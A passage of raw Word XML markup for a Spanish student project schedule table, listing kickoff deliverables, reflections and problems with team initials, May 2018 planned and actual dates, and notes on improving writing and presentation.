            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Mejorar la redacción y mostrar una parte visual agradable para la persona que consulte este documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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Arranque del proyecto(Matriz de responsabilidad-Lista de factores de desempeño)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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AMG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Mejorar la redacción y mostrar una parte visual agradable para la persona que consulte este documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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Arranque del proyecto(Esquema del ciclo de vida-Justificación de las actividades)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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JAAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Mejorar la redacción y mostrar una parte visual agradable para la persona que consulte este documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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Arranque del proyecto(Diagrama de Gantt-Diagrama de ruta crítica)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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EAMM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Mejorar la redacción y mostrar una parte visual agradable para la persona que consulte este documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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Reflexiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>TODOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00C452D1">
              <w:t>Una de las áreas de mejora es dar más tiempo y concentración a la redacción de las reflexiones, para así hacerlas de mejor manera.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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Problemas presentados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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TODOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
